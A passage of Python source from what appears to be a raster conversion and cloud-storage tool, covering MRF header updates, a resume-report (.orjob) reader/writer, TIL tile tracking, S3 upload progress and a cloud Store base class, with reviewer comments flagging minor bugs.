                    '{}{}'.format(trueInput, '?' + azSAS if azSAS else '')))
                cachedNode[0].appendChild(nodeSource)
                nodeMeta[0].insertBefore(cachedNode[0], nodeRaster[0])
            if (self._mode):
                if (self._mode.startswith('mrf') or
                        self._mode == 'clonemrf'):
                    node = doc.getElementsByTagName('Source')
                    if (node):
                        node[0].setAttribute('clone', 'true')
                elif(self._mode == 'splitmrf'):
                    # remember the compression so the cache data/index file
                    # extensions can be matched below.
                    CONST_LBL_COMP = 'Compression'
                    node = doc.getElementsByTagName(CONST_LBL_COMP)
                    if (node):
                        if (node[0].hasChildNodes()):
                            comp_val = node[0].firstChild.nodeValue.lower()
            cache_output = self._base.convertToForwardSlash(
                os.path.dirname(output))
            # make sure the 'CacheSource/Source' is pointing at the processed raster output
            if (autoCreateRasterProxy):
                node = doc.getElementsByTagName('Source')
                if (node):
                    sourceVal = _rasterSource
                    if (not sourceVal.endswith(baseURL)):
                        sourceVal = os.path.join(
                            _rasterSource, baseURL.split(CloudOGTIFFExt)[0])
                    node[0].firstChild.nodeValue = sourceVal
            # ends
            if (self._cachePath):
                cache_output = self._cachePath
            if (not self._base.getUserConfiguration):
                raise Exception('Err/Internal. UpdateMRF/getUserConfiguration')
            cacheSubFolders = ''
            if (self._cachePath):
                cacheSubFolders = self._base.convertToForwardSlash(os.path.dirname(
                    output)).replace(self._output if self._cachePath else self._homePath, '')
            (f, ext) = os.path.splitext(baseURL)
            mkCachePath = '{}{}{}{}'.format(
                cache_output, cacheSubFolders, f, _CCACHE_EXT)
            if (mkCachePath.find(':') == -1):
                # Get abs path in case the -output was relative for cache to function properly.
                mkCachePath = os.path.abspath(mkCachePath)
                mkCachePath = mkCachePath.replace('\\', '/')
            rep_data_file = rep_indx_file = mkCachePath
            nodeData = nodeIndex = None
            if (comp_val):
                extensions_lup = {
                    'lerc': {'data': '.lrc', 'index': '.idx'}
                }
            useTokenPath = self._base.convertToTokenPath(doc.getElementsByTagName('Source')[0].firstChild.nodeValue,
                                                         CS3STORAGE_OUT if self._base.getBooleanValue(self._base.getUserConfiguration.getValue(CCLOUD_UPLOAD)) else CS3STORAGE_IN)
            if (useTokenPath is not None):
                doc.getElementsByTagName(
                    'Source')[0].firstChild.nodeValue = useTokenPath
            nodeData = nodeRaster[0].getElementsByTagName('DataFile')
            if (not nodeData):
                nodeData.append(doc.createElement('DataFile'))
                nodeData[0].appendChild(doc.createTextNode(''))
                nodeRaster[0].appendChild(nodeData[0])
            nodeIndex = nodeRaster[0].getElementsByTagName('IndexFile')
            if (not nodeIndex):
                nodeIndex.append(doc.createElement('IndexFile'))
                nodeIndex[0].appendChild(doc.createTextNode(''))
                nodeRaster[0].appendChild(nodeIndex[0])
            if (nodeData):
                if (comp_val and
                        comp_val in extensions_lup):
                    rep_data_file = rep_data_file.replace(
                        _CCACHE_EXT, extensions_lup[comp_val]['data'])
                nodeData[0].firstChild.nodeValue = rep_data_file
            if (nodeIndex):
                if (comp_val and
                        comp_val in extensions_lup):
                    rep_indx_file = rep_indx_file.replace(
                        _CCACHE_EXT, extensions_lup[comp_val]['index'])
                nodeIndex[0].firstChild.nodeValue = rep_indx_file
            # GDAL mrf driver can't handle XML entity names.
            # NOTE(review): this replace is a no-op ('"' -> '"'); upstream
            # presumably replaced '&quot;' with '"' — looks like an encoding
            # loss; confirm against the original source.
            _mrfBody = doc.toxml().replace('"', '"')
            _indx = _mrfBody.find('<{}>'.format(_CDOC_ROOT))
            if (_indx == -1):
                raise Exception('Err. Invalid MRF/header')
            _mrfBody = _mrfBody[_indx:]
            rpCSV = self._base._isRasterProxyFormat(
                self._base.getUserConfiguration.getValue('rpformat'))
            if (rpCSV):
                # csv proxies are accumulated in memory as single lines.
                _mrfBody = _mrfBody.replace('\n', '') + '\n'
                self._base._modifiedProxies.append(_mrfBody)
                if (self._or_mode == 'rasterproxy' or
                        self._base.getUserConfiguration.getValue(CCLONE_PATH)):  # if using the template 'CreateRasterProxy', keep only the .csv file.
                    try:
                        if (not self._base._isRasterProxyFormat('csv')):
                            os.remove(self._input)
                        os.remove('{}.aux.xml'.format(self._input))
                    except BaseException as e:
                        pass  # not an error
            else:
                with open(output.split(CloudOGTIFFExt)[0] if isCOGTIFF else output, 'w') as c:
                    c.write(_mrfBody)
                if (isCOGTIFF):
                    os.remove(output)
        except Exception as e:
            if (self._base):
                self._base.message('Updating ({}) was not successful!\nPlease make sure the input is (MRF) format.\n{}'.format(
                    output, str(e)), self._base.const_critical_text)
            return False
        return True
class Report:
    """Reader/writer for the .orjob resume-report file: a tab-separated list
    of input rasters with per-file copied/processed/uploaded status plus
    '# key=value' header lines."""
    CHEADER_PREFIX = '#'
    CJOB_EXT = '.orjob'
    CVSCHAR = '\t'
    CRPT_URL_TRUENAME = 'URL_NAME'
    CHDR_TEMPOUTPUT = CTEMPOUTPUT
    CHDR_CLOUDUPLOAD = 'cloudupload'
    CHDR_CLOUD_DWNLOAD = 'clouddownload'
    CHDR_MODE = 'mode'
    CHDR_OP = 'op'
    # Delay in secs before the partial status of the .orjob gets written to the local disk.
    SnapshotDelay = 20
    def __init__(self, base):
        self._input_list = []
        # per-file status dict keyed by forward-slashed path.
        self._input_list_info = {}
        # extra per-file metadata keyed by position in _input_list_info.
        self._input_list_info_ex = {}
        self._header = {
            'version': '{}/{}'.format(Application.__program_ver__, Application.__program_date__)
        }
        self._base = base
        self._isInputHTTP = False
        self._m_rasterAssociates = RasterAssociates()
        # To copy files required by raster formats to the primary raster copy location (-tempinput?) before any conversion could take place.
        self._m_rasterAssociates.addRelatedExtensions('img;IMG', 'ige;IGE')
        # certain associated files need to be present alongside rasters for GDAL to work successfully.
        self._m_rasterAssociates.addRelatedExtensions(
            'ntf;NTF;tif;TIF', 'RPB;rpb')
        # status report for these extensions will be skipped. Case insensitive comparison.
        # NOTE(review): parentheses without a trailing comma make this a str,
        # not a tuple; str.endswith accepts a plain str, so it works — but
        # adding more extensions later requires a real tuple.
        self._m_skipExtentions = ('til.ovr')
        self._rptPreviousTime = datetime.now()
    def init(self, report_file, root=None):
        """Validate (report_file) (.orjob), create its folder and seed the
        list with (root) as the first entry. Returns True on success."""
        if (not self._base or
                not isinstance(self._base, Base)):
            return False
        if (not report_file):
            return False
        if (not report_file.lower().endswith(self.CJOB_EXT)):
            return False
        try:
            folder = os.path.dirname(os.path.abspath(report_file))
            if (not os.path.exists(folder)):
                os.makedirs(folder)
        except Exception as e:
            self._base.message('init failure with path ({}) at (Reporter)'.format(
                folder), self._base.const_critical_text)
            return False
        self._report_file = report_file
        if (root):
            f, e = os.path.splitext(root)
            _root = root.replace('\\', '/')
            if ((self._base.getUserConfiguration and
                    self._base.getUserConfiguration.getValue('Mode') == BundleMaker.CMODE)):
                self._input_list.append(_root)
                return True
            _root = self._base.convertToForwardSlash(_root, True)
            # first element in the report is the -input path to source
            self._input_list.append(_root)
        return True
    @property
    def header(self):
        return self._header
    @header.setter
    def header(self, value):
        self._header = value
    def getRecordStatus(self, input, type):  # returns (true or false)
        """Return the stored status string (CRPT_YES/CRPT_NO/'') for (input)
        and status column (type), or CRPT_UNDEFINED when unknown."""
        if (input is None or
                type is None):
            return CRPT_UNDEFINED
        try:
            return (self._input_list_info[input][type.upper()])
        except BaseException:
            pass
        return CRPT_UNDEFINED
    @staticmethod
    def getUniqueFileName():
        """Return a timestamp-based job name, e.g. 'OR_20240101T120000123456'."""
        _dt = datetime.now()
        _prefix = 'OR'
        _jobName = _prefix + "_%04d%02d%02dT%02d%02d%02d%06d" % (_dt.year, _dt.month, _dt.day,
                                                                 _dt.hour, _dt.minute, _dt.second, _dt.microsecond)
        return _jobName
    def _createSnapshot(self):  # take snapshot/updates .job file partially.
        # throttled flush: rewrite the .orjob at most every SnapshotDelay secs.
        rptCurrentTime = datetime.now()
        rptDuration = (rptCurrentTime - self._rptPreviousTime).total_seconds()
        if (rptDuration > self.SnapshotDelay):
            result = self.write()
            self._base.message(
                'Orjob/Snapshot/Status>{}@{}'.format(str(result), str(str(datetime.utcnow()))))
            self._rptPreviousTime = rptCurrentTime
    # input is the (src) path name which is case sensitive.
    def updateRecordStatus(self, input, type, value):
        """Set status (value: yes/no) for column (type: copied/processed/
        uploaded) on the record matching (input), normalizing temp/output
        paths and query strings back to the original source key.
        Returns True on success."""
        if (input is None or
                type is None or
                value is None):
            return False
        self._createSnapshot()
        _type = type.upper()
        _value = value.lower()
        # pre-signed S3 URLs are used verbatim as keys.
        if (-1 != input.find('X-Amz-Credential=')):
            if (input in self._input_list_info):
                self._input_list_info[input][_type] = _value
            return True
        _input = input.strip().split('?')[0]
        if (_input.lower().endswith(self._m_skipExtentions)):
            return True  # not flagged as an err
        if (CTEMPINPUT in self._header):
            if (_input.startswith(self._header[CTEMPINPUT])):
                # map a -tempinput path back to its source record, resolving
                # renamed downloads via the stored URL_NAME.
                _input = _input.replace(self._header[CTEMPINPUT], self.root)
                (p, e) = os.path.split(_input)
                for _k in self._input_list_info:
                    if (_k.startswith(p)):
                        if (self.CRPT_URL_TRUENAME in self._input_list_info[_k]):
                            if (self._input_list_info[_k][self.CRPT_URL_TRUENAME] == e):
                                _input = _k
                                break
        _path = os.path.dirname(_input.replace('\\', '/'))
        if (not _path.endswith('/')):
            _path += '/'
        if (CRESUME_HDR_OUTPUT in self._header and
                _path == self._header[CRESUME_HDR_OUTPUT]):
            _input = _input.replace(_path, self._header[CRESUME_HDR_INPUT])
        # strip derived extensions (e.g. '.mrf.aux.xml') until a known record
        # key is found.
        (p, e) = os.path.splitext(_input)
        while(e):
            _input = '{}{}'.format(p, e)
            if (_input in self._input_list_info):
                break
            (p, e) = os.path.splitext(p)
        if (_type not in [CRPT_COPIED, CRPT_PROCESSED, CRPT_UPLOADED]):
            self._base.message('Invalid type ({}) at (Reporter)'.format(
                type), self._base.const_critical_text)
            return False
        if (_value not in [CRPT_YES, CRPT_NO]):
            self._base.message('Invalid value ({}) at (Reporter)'.format(
                _value), self._base.const_critical_text)
            return False
        if (not e):
            if (_input in self._input_list_info and
                    self.CRPT_URL_TRUENAME in self._input_list_info[_input]):
                (p, e) = os.path.splitext(
                    self._input_list_info[_input][self.CRPT_URL_TRUENAME])
            if (not e):  # still no extension?
                self._base.message(
                    'Invalid input/no extension for ({})/Reporter'.format(_input), self._base.const_warning_text)
                self._input_list_info[_input][_type] = _value
                return False
        self._input_list_info[_input][_type] = _value
        return True
    def addHeader(self, key, value):
        # header keys are stored lower-cased.
        if (not key or
                value is None):
            return False
        self._header[key.lower()] = value
        return True
    def removeHeader(self, key):
        if (not key):
            return False
        if (not key.lower() in self._header):
            return False
        del self._header[key.lower()]
        return True
    def addFile(self, file):
        """Append (file) to the input list; rejects duplicates. Returns True
        when added."""
        if (not file):
            return False
        _file = file.replace('\\', '/')
        _get_store = self.findWith(_file)
        if (_get_store and
                _get_store == _file):
            return False  # no duplicate entries allowed.
        self._input_list.append(_file)
        return True
    @property
    def items(self):
        return self._input_list
    @property
    def operation(self):
        """Return the 'op' header value, lower-cased except for case-sensitive
        lambda operations; None when absent/empty."""
        Operation = COP.lower()
        if (Operation not in self._header):
            return None
        op = self._header[Operation]
        if (not op):
            return None
        if (op.lower().startswith(COP_LAMBDA)):
            return op  # lambda op values are case-sensitive.
        return op.lower()  # lower case values for all other operations.
    @property
    def root(self):
        """Return the job's source root (header input path preferred over the
        first list entry), '/'-suffixed for http(s) inputs."""
        if (not self._input_list):
            return ''
        _root = self._input_list[0]
        if (CRESUME_HDR_INPUT in self._header):
            _root = self._header[CRESUME_HDR_INPUT]
        if (_root.lower().startswith('http')):
            if (not _root.endswith('/')):
                _root += '/'
        return _root
    def read(self, readCallback=None):
        """Parse the .orjob file: '# key=value' lines populate the header,
        the remaining tab-separated lines populate the per-file status table.
        (readCallback), when given, is invoked with each raw line.
        Returns True on success."""
        try:
            with open(self._report_file, 'r', encoding='utf-8') as _fptr:
                ln = _fptr.readline()
                hdr_skipped = False
                # If 'resume=='retryall', files will be copied/processed/uploaded regardless of the individual file status.
                retryAll = False
                while(ln):
                    ln = ln.strip()
                    if (not ln or
                            ln.startswith('##')):  # ignore empty-lines and comment lines (beginning with '##')
                        ln = _fptr.readline()
                        continue
                    if (readCallback):  # client side callback support.
                        readCallback(ln)
                    lns = ln.split(self.CVSCHAR)
                    _fname = lns[0].strip().replace('\\', '/')
                    if (_fname.startswith(self.CHEADER_PREFIX)):
                        _hdr = _fname.replace(
                            self.CHEADER_PREFIX, '').split('=')
                        if (len(_hdr) > 1):
                            _hdr_key = _hdr[0].strip()
                            _hdr.pop(0)
                            _hdr_val = '='.join(_hdr).strip()
                            if (_hdr_key == CTEMPINPUT or
                                    _hdr_key == CTEMPOUTPUT):
                                if (not _hdr_val.endswith('/')):
                                    _hdr_val += '/'
                            elif (_hdr_key == Lambda.queue_length):
                                if (not str.isdigit(_hdr_val)):
                                    ln = _fptr.readline()
                                    continue
                                # filter {Lambda.queuelength}
                                _hdr_val = int(_hdr_val)
                            elif (_hdr_key == self.CHDR_MODE):
                                _hdr_val = _hdr_val.lower()  # lower case (mode)
                            self.addHeader(_hdr_key, _hdr_val)
                        ln = _fptr.readline()
                        continue
                    if (not _fname or
                            not hdr_skipped):  # do not accept empty lines.
                        # NOTE(review): 'ln.find(CRPT_COPIED)' is a truthiness
                        # check on str.find (-1 is truthy, 0 is falsy) — likely
                        # intended '>= 0'; confirm against upstream.
                        if (ln.find(CRPT_SOURCE) >= 0 and
                                ln.find(CRPT_COPIED)):  # skip line if it's the column header without the '#' prefix?
                            ln = _fptr.readline()
                        if (_fname):
                            hdr_skipped = True
                            if (CRESUME_HDR_INPUT in self._header):
                                _input = self._header[CRESUME_HDR_INPUT]
                                self._header[CRESUME_HDR_INPUT] = self._base.convertToForwardSlash(
                                    _input, True)  # force suffix with '/' for input folders
                                _input = _input.lower()
                                if (_input.startswith('http://') or
                                        _input.startswith('https://')):
                                    self._isInputHTTP = True
                            if (not retryAll and
                                    CRESUME_ARG in self._header):
                                if (self._header[CRESUME_ARG].lower() == CRESUME_ARG_VAL_RETRYALL):
                                    retryAll = True
                        continue
                    # for now, previously stored status values aren't used.
                    _copied = '' if len(lns) <= 1 else lns[1].strip()
                    _processed = '' if len(lns) <= 2 else lns[2].strip()
                    _uploaded = '' if len(lns) <= 3 else lns[3].strip()
                    if (retryAll):
                        _copied = _processed = _uploaded = ''  # reset all status
                    if (self.addFile(_fname)):
                        self._input_list_info[_fname] = {
                            CRPT_COPIED: _copied,
                            CRPT_PROCESSED: _processed,
                            CRPT_UPLOADED: _uploaded
                        }
                    ln = _fptr.readline()
        except Exception as exp:
            self._base.message('{}'.format(str(exp)),
                               self._base.const_critical_text)
            return False
        return True
    def findExact(self, input):
        # exact-match lookup in the input list.
        if (not self._input_list):
            return None
        for f in self._input_list:
            if (f == input):
                return f
        return None
    def findWith(self, input):
        # substring-match lookup; returns the first entry containing (input).
        if (not self._input_list):
            return None
        for f in self._input_list:
            if (f.find(input) != -1):
                return f
        return None
    # successful job files can be moved over to a given folder.
    def moveJobFileToPath(self, path):
        """Move the .orjob file into (path), creating the folder if needed.
        Returns True on success."""
        if (not path):
            return False
        try:
            get_tile = os.path.basename(self._report_file)
            mk_path = os.path.join(path, get_tile)
            if (not os.path.exists(path)):
                makedirs(path)
            self._base.message('[MV] {}'.format(mk_path))
            shutil.move(self._report_file, mk_path)
        except Exception as e:
            self._base.message('({})'.format(str(e)),
                               self._base.const_critical_text)
            return False
        return True
    def hasFailures(self):
        """Return True if any record has a 'no' in any status column.
        NOTE(review): assumes every listed file has a status entry — a file
        added via addFile() without status would raise KeyError; confirm."""
        if (not self._input_list):
            return False
        for f in self:
            if (self._input_list_info[f][CRPT_COPIED] == CRPT_NO or
                    self._input_list_info[f][CRPT_PROCESSED] == CRPT_NO or
                    self._input_list_info[f][CRPT_UPLOADED] == CRPT_NO):
                return True
        return False
    def write(self):
        """Rewrite the complete .orjob file (headers + per-file status rows).
        Returns True on success."""
        try:
            _frmt = '{}/{}/{}/{}\n'.replace('/', self.CVSCHAR)
            with open(self._report_file, 'w+', encoding='utf-8') as _fptr:
                for key in self._header:
                    if (self.CHDR_OP == key):
                        # op==createjob header is not written out into the output .orjob file.
                        # This allows the .orjob file to be used with the -input arg to process the data separately.
                        if (self._header[key] == COP_CREATEJOB):
                            continue
                    _fptr.write('{} {}={}\n'.format(
                        self.CHEADER_PREFIX, key, self._header[key]))
                _fptr.write(_frmt.format(CRPT_SOURCE, CRPT_COPIED,
                                         CRPT_PROCESSED, CRPT_UPLOADED))
                for f in self._input_list:
                    _fptr.write(_frmt.format(f,
                                             self._input_list_info[f][CRPT_COPIED] if f in self._input_list_info else '',
                                             self._input_list_info[f][CRPT_PROCESSED] if f in self._input_list_info else '',
                                             self._input_list_info[f][CRPT_UPLOADED] if f in self._input_list_info else ''
                                             ))
        except Exception as exp:
            self._base.message('{}'.format(str(exp)),
                               self._base.const_critical_text)
            return False
        return True
    def writeTimeItReport(self, reportFile):
        """Dump the base's per-file timing info to a CSV at (reportFile).
        Returns True on success."""
        import csv
        try:
            with open(reportFile, 'w', newline='') as csvfile:
                fieldnames = [TimeIt.Name, TimeIt.Conversion,
                              TimeIt.Overview, TimeIt.Download, TimeIt.Upload]
                writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
                writer.writeheader()
                for f in self._base.timedInfo['files']:
                    writer.writerow(f)
        except Exception as e:
            self._base.message('TimeIt> {}'.format(str(e)),
                               self._base.const_critical_text)
            return False
        return True
    def walk(self):
        # present the flat input list in os.walk-like (root, dirs, files) tuples.
        walk_tree = []
        for f in self:
            (d, f) = os.path.split(f)
            walk_tree.append(('{}/'.format(d), (), (f.strip(),)))
        return walk_tree
    def __iter__(self):
        return iter(self._input_list)
    def syncRemoteToLocal(self, statusInfo):
        """Merge per-file status from a remote job result (statusInfo dict with
        'input_list_info') into this report. Returns True on success."""
        if (not statusInfo):
            return False
        InputListInfo = 'input_list_info'
        if (InputListInfo not in statusInfo):
            return False
        for entry in statusInfo[InputListInfo]:
            status = statusInfo[InputListInfo][entry]
            for _type in status:
                if (not status[_type]):
                    continue
                self.updateRecordStatus(entry, _type, status[_type])
        return True
    def addMetadata(self, file, key, value):
        """Attach an extra (key, value) to the record for (file); keyed by the
        record's position in _input_list_info. Returns True on success."""
        if (file is None or
                key is None or
                value is None):
            self._base.message('addMetadata/null',
                               self._base.const_critical_text)
            return False
        _file = file.replace('\\', '/')
        srchIndex = -1
        try:
            srchIndex = list(self._input_list_info.keys()).index(_file)
        except Exception as e:
            return False
        if (srchIndex not in self._input_list_info_ex):
            self._input_list_info_ex[srchIndex] = {}
        self._input_list_info_ex[srchIndex][key] = value
        return True
    def getMetadata(self, file, key):
        """Return the metadata (key) stored for (file) via addMetadata(), or
        None when absent.
        NOTE(review): raises KeyError if no metadata was ever added for this
        file (srchIndex missing from _input_list_info_ex) — confirm callers
        always addMetadata() first."""
        if (file is None or
                key is None):
            self._base.message('getMetadata/null',
                               self._base.const_critical_text)
            return None
        _file = file.replace('\\', '/')
        srchIndex = -1
        try:
            srchIndex = list(self._input_list_info.keys()).index(_file)
        except Exception as e:
            return None
        if (key not in self._input_list_info_ex[srchIndex]):
            return None
        return self._input_list_info_ex[srchIndex][key]
    def __len__(self):
        return len(self._input_list)
    def __getitem__(self, index):
        return self._input_list[index]
# class to read/gather info on til files.
class TIL:
    """Collects .til (raster tile-index) files and tracks the raster files
    each one references, so TIL processing can be deferred until every
    related file has been downloaded/processed."""
    # keys of the per-TIL bookkeeping dict (_tils_info)
    CRELATED_FILE_COUNT = 'related_file_count'
    CPROCESSED_FILE_COUNT = 'processed_file_count'
    CKEY_FILES = 'files'
    CRASTER_EXT_IN_TIL = 'rasterExtension'

    def __init__(self):
        self._rasters = []      # raster file names referenced by any TIL
        self._tils = []         # normalized ('/') TIL paths in add order
        self._tils_info = {}    # per-TIL info keyed by lower-cased path
        self._output_path = {}  # TIL path -> output path
        self._defaultTILProcessing = False

    @property
    def defaultTILProcessing(self):
        """True when TILs should go through the default processing path."""
        return self._defaultTILProcessing

    @defaultTILProcessing.setter
    def defaultTILProcessing(self, value):
        self._defaultTILProcessing = value

    @property
    def TILCount(self):
        """Number of distinct TIL files registered."""
        return len(self._tils)

    # add (til) files to process later via (fnc: process).
    def addTIL(self, input):
        """Register a TIL file for later processing; returns True.

        The associated files may not exist at the TIL location yet because
        they may not have been downloaded, so only bookkeeping happens here.
        """
        _input = input.replace('\\', '/')
        if (_input not in self._tils):
            self._tils.append(_input)
        # Fix: test the same normalized key that is used for storage.
        # Previously the raw (un-normalized) path was checked, so re-adding
        # a backslash variant of a registered TIL reset its counters.
        if (_input.lower() not in self._tils_info):
            self._tils_info[_input.lower()] = {
                self.CRELATED_FILE_COUNT: 0,
                self.CPROCESSED_FILE_COUNT: 0,
                self.CKEY_FILES: [],
                self.CRASTER_EXT_IN_TIL: None
            }
        return True

    def findOriginalSourcePath(self, processPath):
        """Reverse lookup: return the TIL path mapped to processPath."""
        for path in self._output_path:
            if (self._output_path[path] == processPath):
                return path
        return None

    def fileTILRelated(self, input):
        """Heuristically check whether a file belongs to any known TIL or to
        a raster referenced by one (matched on the base name, sans ext)."""
        baseName = input.split('.')[0]
        baseName = baseName.replace('\\', '/').split('/')[-1]
        for t in self._tils:
            if (t.find(baseName) >= 0):
                return True
        for t in self._rasters:
            if (t.startswith(baseName)):
                return True
        return False

    def addFileToProcessed(self, input):
        """Bump the processed count on the first TIL that lists *input*."""
        for t in self._tils:
            _key_til_info = t.lower()
            if (_key_til_info in self._tils_info):
                if (input in self._tils_info[_key_til_info][self.CKEY_FILES]):
                    self._tils_info[_key_til_info][self.CPROCESSED_FILE_COUNT] += 1
                    return True
        return False

    def isAllFilesProcessed(self, input):
        """True when every file related to the given TIL has been processed."""
        if (not input):
            return False
        # Normalize the separator so callers may pass either path style,
        # consistent with the keys stored by addTIL.
        _key_til_info = input.replace('\\', '/').lower()
        if (_key_til_info not in self._tils_info):
            return False
        return (self._tils_info[_key_til_info][self.CRELATED_FILE_COUNT] ==
                self._tils_info[_key_til_info][self.CPROCESSED_FILE_COUNT])

    def _processContent(self, fileName, line):
        """Parse one TIL line; record any raster named by a 'filename =' entry."""
        if (not line or
                not fileName):
            return False
        ln = line.strip()
        CBREAK = 'filename ='
        if (ln.find(CBREAK) == -1):
            return True  # nothing of interest on this line
        splt = ln.replace('"', '').replace(';', '').split(CBREAK)
        if (len(splt) == 2):
            file_name = splt[1].strip()
            if (file_name not in self._rasters):
                self._rasters.append(file_name)
            _key_til_info = fileName.lower()
            # Fix: verify the TIL is registered before indexing its info;
            # the previous code indexed _tils_info unconditionally first and
            # raised KeyError for TILs never passed through addTIL.
            if (_key_til_info in self._tils_info):
                if (not self._tils_info[_key_til_info][self.CRASTER_EXT_IN_TIL]):
                    rasterExtension = RasterAssociates.findExtension(file_name)
                    if (rasterExtension):
                        self._tils_info[_key_til_info][self.CRASTER_EXT_IN_TIL] = rasterExtension
                self._tils_info[_key_til_info][self.CRELATED_FILE_COUNT] += 1
                self._tils_info[_key_til_info][self.CKEY_FILES].append(
                    file_name)
        return True

    def processInMemoryTILContent(self, fileName, content):
        """Index TIL content already held in memory (newline-separated)."""
        if (content is None):
            return False
        for line in content.split('\n'):
            self._processContent(fileName, line)
        return True

    def process(self, input):
        """Read a TIL file from disk line by line and index its contents."""
        if (not input or
                len(input) == 0):
            return False
        if (not os.path.exists(input)):
            return False
        with open(input, 'r') as _fp:
            _line = _fp.readline()
            while (_line):
                self._processContent(input, _line)
                _line = _fp.readline()
        return True

    # set the output path for each til entry on list.
    def setOutputPath(self, input, output):
        """Remember where the given TIL's output goes (first write wins)."""
        if (input not in self._output_path):
            self._output_path[input] = output

    def getOutputPath(self, input):
        """Return the recorded output path for a TIL, or None."""
        if (input not in self._output_path):
            return None
        return self._output_path[input]

    def find(self, input):
        """True when *input* is listed by a TIL with more than one related
        file; False for single-file TILs or unknown files."""
        for _t in self._tils_info:
            if (input in self._tils_info[_t][self.CKEY_FILES]):
                if (self._tils_info[_t][self.CRELATED_FILE_COUNT] <= 1):
                    return False
                return True
        return False

    def __iter__(self):
        return iter(self._tils)
class ProgressPercentage(object):
    """Thread-safe byte-count progress callback for file transfers.

    Instances are handed to transfer APIs (e.g. boto3 upload callbacks) and
    invoked with the number of bytes moved since the previous call.
    """

    def __init__(self, base, filename):
        self._base = base  # base (Base-like messenger; may be None)
        self._filename = filename
        self._size = float(os.path.getsize(filename))
        self._seen_so_far = 0
        self._lock = threading.Lock()

    def __call__(self, bytes_amount):
        """Accumulate *bytes_amount* and report progress.

        Routes the progress line through base.message() when available
        (returning True), otherwise writes it to stdout.
        """
        with self._lock:
            self._seen_so_far += bytes_amount
            # Fix: zero-byte files previously raised ZeroDivisionError here;
            # report them as 100% instead.
            percentage = (self._seen_so_far / self._size) * 100 if self._size else 100.0
            message = "%s / %d (%.2f%%)" % (
                self._seen_so_far, self._size,
                percentage)
            if (self._base is not None):
                if (hasattr(self._base, 'message')):
                    self._base.message(message, self._base.const_general_text)
                    return True
            sys.stdout.write(message)
            sys.stdout.flush()
class S3Upload:
    """Uploads one local file to an S3 key via boto3's managed transfer,
    with support for refreshing expired role credentials mid-job."""

    def __init__(self, base, s3_bucket, s3_path, local_file, acl_policy='private'):
        # base: Base-like logger/config object (provides message()/const_*).
        self._base = base  # base
        self.m_s3_path = s3_path
        self.m_local_file = local_file
        self.m_s3_bucket = s3_bucket  # boto3 Bucket resource
        # Blank or None ACL falls back to 'private'.
        self.m_acl_policy = 'private' if acl_policy is None or acl_policy.strip() == '' else acl_policy
        self.mp = None  # boto3 S3Transfer helper; created in init()
        pass

    def init(self):
        """Create the boto3 S3Transfer helper from the bucket's client.

        Returns True on success, False (after logging) on any failure.
        """
        try:
            from boto3.s3.transfer import S3Transfer, TransferConfig
            self.mp = S3Transfer(self.m_s3_bucket.meta.client)
        except Exception as e:
            self._base.message('({})'.format(str(e)),
                               self._base.const_critical_text)
            return False
        return True

    @TimeIt.timeOperation
    def upload(self, **kwargs):
        """Upload the local file to (bucket, key) using the stored ACL.

        Returns True only when the transfer completed. On failure returns
        False; when the failure looks like an expired STS token
        ('(ExpiredToken)' in the message) and kwargs supplies 'fptrRefresh',
        a fresh bucket handle is obtained and the transfer helper re-created
        so the caller can retry, and the message is logged as a warning
        rather than critical.
        """
        # if (self.m_local_file.endswith('.lrc')): # debug. Must be removed before release.
        # return True
        self._base.message('[S3-Push] {}'.format(self.m_local_file))
        try:
            self.mp.upload_file(self.m_local_file, self.m_s3_bucket.name, self.m_s3_path, extra_args={
                                'ACL': self.m_acl_policy}, callback=ProgressPercentage(self._base, self.m_local_file))
        except Exception as e:  # trap any connection issues.
            msg = str(e)
            # Expired-token detection is by substring match on the error text.
            isRefreshToken = msg.find('(ExpiredToken)') != -1
            if (isRefreshToken):
                if ('fptrRefresh' in kwargs):
                    self.m_s3_bucket = kwargs['fptrRefresh']()
                    if (self.m_s3_bucket):
                        ret = self.init()  # will ignore (ret) value to allow (retry) by the caller
                        self._base.message('recycled at {} -> ret from refreshCallback {}\n'.format(datetime.utcnow(), ret))
            self._base.message('({})'.format(msg),
                               self._base.const_warning_text if isRefreshToken else self._base.const_critical_text)
            return False
        return True

    def __del__(self):
        # Drop the transfer-helper reference when the object is collected.
        if (self.mp):
            self.mp = None
class SlnTMStringIO:
    """A minimal file-like adapter over an anonymous memory-mapped buffer.

    Only the subset of the file protocol this tool uses is implemented
    (seek/tell/read/write/close); the remaining methods are deliberate
    no-ops kept for interface compatibility.
    """

    def __init__(self, size, buf=''):
        self.m_size = size
        self.m_buff = mmap.mmap(-1, self.m_size)
        self.m_spos = self.m_fsize = 0  # logical read cursor / bytes written

    def close(self):
        """Release the underlying mmap."""
        self.m_buff.close()
        del self.m_buff

    def next(self):
        pass  # not supported

    def seek(self, pos, mode=0):
        """Move the logical cursor (0=absolute, 1=relative, 2=from buffer end)."""
        if mode == 1:
            pos = self.m_spos + pos
        elif mode == 2:
            pos = len(self.m_buff) + pos
        self.m_spos = pos if pos > 0 else 0

    def tell(self):
        """Current logical cursor position."""
        return self.m_spos

    def read(self, n=-1):
        """Read up to *n* bytes from the cursor, clamped to what was written."""
        n = min(n, self.m_fsize - self.m_spos)
        self.m_buff.seek(self.m_spos, 0)
        self.m_spos += n
        return self.m_buff.read(n)

    def readline(self, length=None):
        pass  # not supported

    def readlines(self, sizehint=0):
        pass  # not supported

    def truncate(self, size=None):
        pass  # not supported

    def write(self, s):
        """Append *s* at the mmap's internal write position."""
        self.m_buff.write(s)
        self.m_fsize += len(s)

    def writelines(self, iterable):
        pass  # not supported

    def flush(self):
        pass  # nothing buffered beyond the mmap itself

    def getvalue(self):
        pass  # not supported
class Store(object):
    """Base class shared by the cloud storage providers.

    Holds the account credentials plus the source/destination locations
    that the concrete provider classes (S3/Azure/Google/Alibaba) act on.
    """
    # log error types
    const_general_text = 0
    const_warning_text = 1
    const_critical_text = 2
    const_status_text = 3
    # ends
    # class usage (Operation) modes
    CMODE_SCAN_ONLY = 0
    CMODE_DO_OPERATION = 1
    # ends
    # cloud-type
    TypeAmazon = 'amazon'
    TypeAzure = 'azure'
    TypeGoogle = 'google'
    TypeAlibaba = 'alibaba'
    # ends

    def __init__(self, account_name, account_key, profile_name, base):
        self._account_name = account_name
        self._account_key = account_key
        self._profile_name = profile_name
        self._base = base
        self._event_postCopyToLocal = None  # optional hook run after a download
        self._include_subFolders = False
        self._mode = self.CMODE_DO_OPERATION

    def init(self):
        """Providers override this for connection setup; default no-op."""
        return True

    def upload(self, file_path, container_name, parent_folder, properties=None):
        """Record the upload target; concrete classes perform the transfer."""
        self._input_file_path = file_path
